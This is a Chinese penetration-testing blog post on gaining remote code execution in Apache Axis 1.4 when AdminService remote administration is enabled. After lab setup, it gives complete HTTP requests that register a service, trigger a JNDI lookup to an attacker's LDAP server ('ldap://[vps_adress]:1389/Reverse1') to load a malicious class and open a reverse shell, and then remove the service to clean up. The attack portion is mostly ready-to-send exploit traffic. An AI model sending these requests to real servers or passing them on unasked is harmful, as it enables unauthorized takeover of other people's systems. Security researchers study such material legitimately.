日期: 2020-06-30
更新: 2020-07-06
分类: 渗透测试
最近利用一个漏洞Axis 1.4 adminservice开启远程访问下可新建服务执行任意方法, 写文件出现问题可试试本文利用默认包中的jndi lookup注入恶意class执行反弹shell
0x01 漏洞形成前提
Axis 1.4
AdminService enableRemoteAdmin == True
0x02 搭建
axis bin包解压后将webapps下axis复制到tomcat环境下的webapps目录下:
http://mirror.navercorp.com/apache/axis/axis/java/1.4/
1. 更新环境变量
执行本地构建命令时需要环境变量找到jar包路径
1 2 3 4 5 6 7
| vim ~/.profile
export AXIS_HOME=/var/lib/tomcat8/webapps/axis export AXIS_LIB=$AXIS_HOME/WEB-INF/lib export AXISCLASSPATH=$AXIS_LIB/axis.jar:$AXIS_LIB/commons-discovery-0.2.jar:$AXIS_LIB/commons-logging-1.0.4.jar:$AXIS_LIB/jaxrpc.jar:$AXIS_LIB/saaj.jar:$AXIS_LIB/log4j-1.2.8.jar:$AXIS_LIB/xml-apis.jar:$AXIS_LIB/xercesImpl.jar:$AXIS_LIB/wsdl4j-1.5.1.jar
source ~/.profile
|
2.开启RemoteAdmin服务
1 2 3 4 5 6 7 8 9 10
| webapps/axis/WEB-INF/deploy.wsdd
<deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"> <service name="AdminService" provider="java:MSG"> <parameter name="className" value="org.apache.axis.utils.Admin"/> <parameter name="allowedMethods" value="*"/> <parameter name="enableRemoteAdmin" value="true"/> </service> </deployment>
|
3.部署刷新配置
1
| java -cp $AXISCLASSPATH org.apache.axis.client.AdminClient deploy.wsdd
|
0x03 源码找到一处jndi调用
1.检索axis服务默认可调用的jar包:
在源码中中发现org.apache.axis.client.ServiceFactory下getService服务中获取environment中的jndiName再进行context.lookup, 这样我们可以通过设置jndiName参数为恶意的服务完成攻击:
0x04 利用过程
1.注册服务:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| POST /axis/services/AdminService HTTP/1.1 Host: 192.168.123.136:8080 Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept-Language: en-US,en;q=0.5 SOAPAction: something Upgrade-Insecure-Requests: 1 Content-Type: application/xml Accept-Encoding: gzip, deflate Content-Length: 737
<?xml version="1.0" encoding="utf-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soapenv:Body> <ns1:deployment xmlns:ns1="http://xml.apache.org/axis/wsdd/" xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"> <ns1:service name="test1Service" provider="java:RPC"> <ns1:parameter name="className" value="org.apache.axis.client.ServiceFactory"/> <ns1:parameter name="allowedMethods" value="*"/> </ns1:service> </ns1:deployment> </soapenv:Body> </soapenv:Envelope>
|
2.调用jndi服务:
访问创建的test1Service进行jndi注入:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
| POST /axis/services/test1Service HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.123.136:8080/axis/servlet/AxisServlet Accept-Encoding: gzip, deflate Accept-Language: zh,zh-TW;q=0.9,zh-CN;q=0.8 Connection: close SOAPAction: Content-Type: text/xml;charset=UTF-8 Host: 192.168.123.136:8080 Content-Length: 720
<?xml version="1.0" encoding="utf-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:buil="http://build.antlr"> <soapenv:Header/> <soapenv:Body> <buil:getService soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <environment xmlns:apachesoap="http://xml.apache.org/xml-soap" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xsi:type="apachesoap:Map"> <item> <key xsi:type="soapenc:string">jndiName</key> <value xsi:type="soapenc:string">ldap://[vps_adress]:1389/Reverse1</value> </item> </environment> </buil:getService> </soapenv:Body> </soapenv:Envelope>
|
3.marshalsec ldap 反弹shell:
4.卸载服务:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| POST /axis/services/AdminService HTTP/1.1 Host: 192.168.123.136:8080 Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept-Language: en-US,en;q=0.5 SOAPAction: something Upgrade-Insecure-Requests: 1 Content-Type: application/xml Accept-Encoding: gzip, deflate Content-Length: 463
<?xml version="1.0" encoding="utf-8"?> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Body> <undeployment xmlns="http://xml.apache.org/axis/wsdd/"> <service name="test1Service"/> </undeployment> </soapenv:Body> </soapenv:Envelope>
|
0x05 参考链接
[https://axis.apache.org/axis/java/install.html](https://axis.apache.org/axis/java/install.html
https://github.com/KibodWapon/Axis-1.4-RCE-Poc